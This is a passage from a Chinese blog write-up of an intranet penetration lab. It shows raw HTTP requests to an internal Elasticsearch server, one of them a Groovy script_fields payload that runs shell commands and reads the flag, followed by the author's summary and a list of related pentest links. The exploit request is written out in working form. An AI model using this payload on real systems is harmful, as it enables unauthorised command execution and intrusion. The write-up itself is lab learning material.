Host: 172.17.0.7:9200
Content-Length: 19
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Origin: http://172.17.0.7:9200
Content-Type: text/plain
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.0.7:9200/mitian/mitian6/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"name": "pdsdt"}

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1f67b23417b042939512ba706f5c3390~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F20060914490c5415a3e45dd8a7.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F20060914490c5415a3e45dd8a7.png”” style=“margin: auto” />

之后再search页面进行构造

POST /_search?pretty HTTP/1.1
Host: 172.17.0.7:9200
Content-Length: 156
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Origin: http://172.17.0.7:9200
Content-Type: text/plain
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.0.7:9200/mitian/mitian6/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("ls").getText()"}}}

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/77327ab504dd40f9a8a5340f01335b8a~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609144975660c4986d67aa6.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609144975660c4986d67aa6.png”” style=“margin: auto” />

成功执行命令,读取一下flag

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/3da80d2dd4c545038237be2437cab66e~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609144959b0bb1489790665.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609144959b0bb1489790665.png”” style=“margin: auto” />

成功获取到flag文件,提交

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/f55acfb254cc48869db1d08763a3a35f~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091449ceae49cc9e6dd031.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091449ceae49cc9e6dd031.png”” style=“margin: auto” />

显示任务完成,并将我们的IP加入了黑名单,真就卸磨杀驴

总结

这个靶机花了我大半天的时间,主要还是在网络配置上面的捯饬,内网的靶机每一个都不太难,重要的就是如何通过流量转发后正确的使用一些工具达到扫描端口爆破服务的目的,总体的收获还是挺大的,虽然和真实环境相比确实差别较大,但刚好最近就在用ES这方面的产品,也趁着这个机会对于ES的相关漏洞也加强了学习。

问题

有没有想学网络安全但又不知道该怎么入手的朋友啊?

yz_weixiao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南
VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 2738
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
渗透测试实战-vulnhub靶机 momentum-2
xnxqwzy的博客
07-31 129
查看kali IP地址ip a所在网段为 192.168.74.0/24使用nmap扫描整个网段扫描结果显示靶机地址疑似为 192.168.74.131扫描该地址的端口情况发现只开放了22和80端口尝试访问web服务似乎只是个静态页面查看网页源码没有什么特别的线索扫描整个网站目录这里文件上传到ajax.php进行处理,前端没有任何过滤限制尝试上传一个jpg文件,上传失败,后端存在文件限制查看ajax.php.bak。
渗透练习 Vulnhub靶场 Tornado
hljzzj的博客
02-15 2105
No.27 Tornado 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-tornado,639/ 靶场: VulnHub.com 靶机名称: IA: Tornado 难度: 中等 发布时间: 2020年12月20日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -
内网渗透vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 2636
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
内网渗透测试安全学习ppt
02-12
1.内网渗透测试 2.安全学习ppt
渗透测试 _ 内网信息收集1
08-03
前言在内网渗透测试中,信息收集的深度与广度,直接关系到整个内网渗透测试的成败,本篇文章主要对内网信息收集做简单介绍~一、内网信息描述当渗透测试人员进入内网后,面
「信息安全」POWERSHELL_内网渗透实例 - 网络安全.zip
12-01
「信息安全」POWERSHELL_内网渗透实例 - 网络安全 渗透测试 数据安全 数据安全 防火墙 安全建设
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
游走于内网之后——工控安全那些事儿.pdf
08-08
目录 1 工控安全之背景 2 工控安全之现状 3 工控安全之我见 4 工控安全之CTF
网络安全-渗透完整笔记
03-27
换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。渗透测试的目的是...
内网渗透神器fscan扫描工具
12-04
Windows下安装fscan扫描工具下载go环境;...go build -ldflags使用说明简单用法fscan.exe -h 192.168.1.1/24 (默认使用全部模块)fscan.exe -h 192.168.1.1/16 (B段扫描)其他用法fscan.exe -h 192.168.1.1/24 -np -no -...
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 ...
内网渗透思路.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
【甄选靶场】Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权)
人间体佐菲的博客
10-02 997
Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权) 信息安全网络安全渗透测试
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 894
vulnhub ai-web1.0
vulnhub靶场渗透系列-- AI:Web:2
lza20001103的博客
10-01 2265
vulnhub靶场渗透系列-- AI:Web:2
内网渗透笔记——vulnhub内网结课渗透
wang_zui_zui的博客
03-14 666
准备步骤: 靶机:Beelzebub ip地址:192.168.111.136 攻击机:kali ip地址:192.168.111.130 Vmware下NAT模式连接 一、进行信息收集 1、使用nmap命令扫网段 发现目标ip——192.168.111.136 2、对目标ip进行详细的扫描 发现开放了22和80两个端口,考虑能不能通过爆破22号端口来取得shell? 3.尝试爆破 利用user&pass.txt字典,为了防止电脑跑烂掉选择admin,user等较常用
内网安全攻防:渗透测试实战指南 pdf下载
07-29
对于内网安全攻防和渗透测试实战指南的PDF下载,首先需要明确渗透测试的目的是为了评估和测试内网安全性,找出可能存在的漏洞和风险,并提供相应的防御建议和措施。 在下载PDF之前,我们应该明确以下几个问题: 1. 有合法的授权和使用权限吗? 渗透测试是一项敏感且潜在危险的活动,需要事先与相关当事人保持沟通和达成共识,以确保测试合法、合规和有授权。因此,在下载之前,我们要确保自己拥有相应的合法权限。 2. 评估所需工具和技能 渗透测试需要一定的技术和工具支持。在下载之前,我们需要评估自己是否具备进行渗透测试所需要的技能和经验,并确认自己是否具备所需的工具和环境。 3. 错误使用导致的后果 渗透测试是一项高风险活动,如果错误使用或者测试方法不当,可能导致严重的后果,如业务中断、数据泄露等。因此,在下载之前,我们需要认识到这一点,并确保自己具备相应的安全意识和责任心。 总之,下载内网安全攻防和渗透测试实战指南的PDF之前,我们要确保自己拥有合法授权和权限,具备相应的技能和工具,以及清楚认识到错误使用可能导致的后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值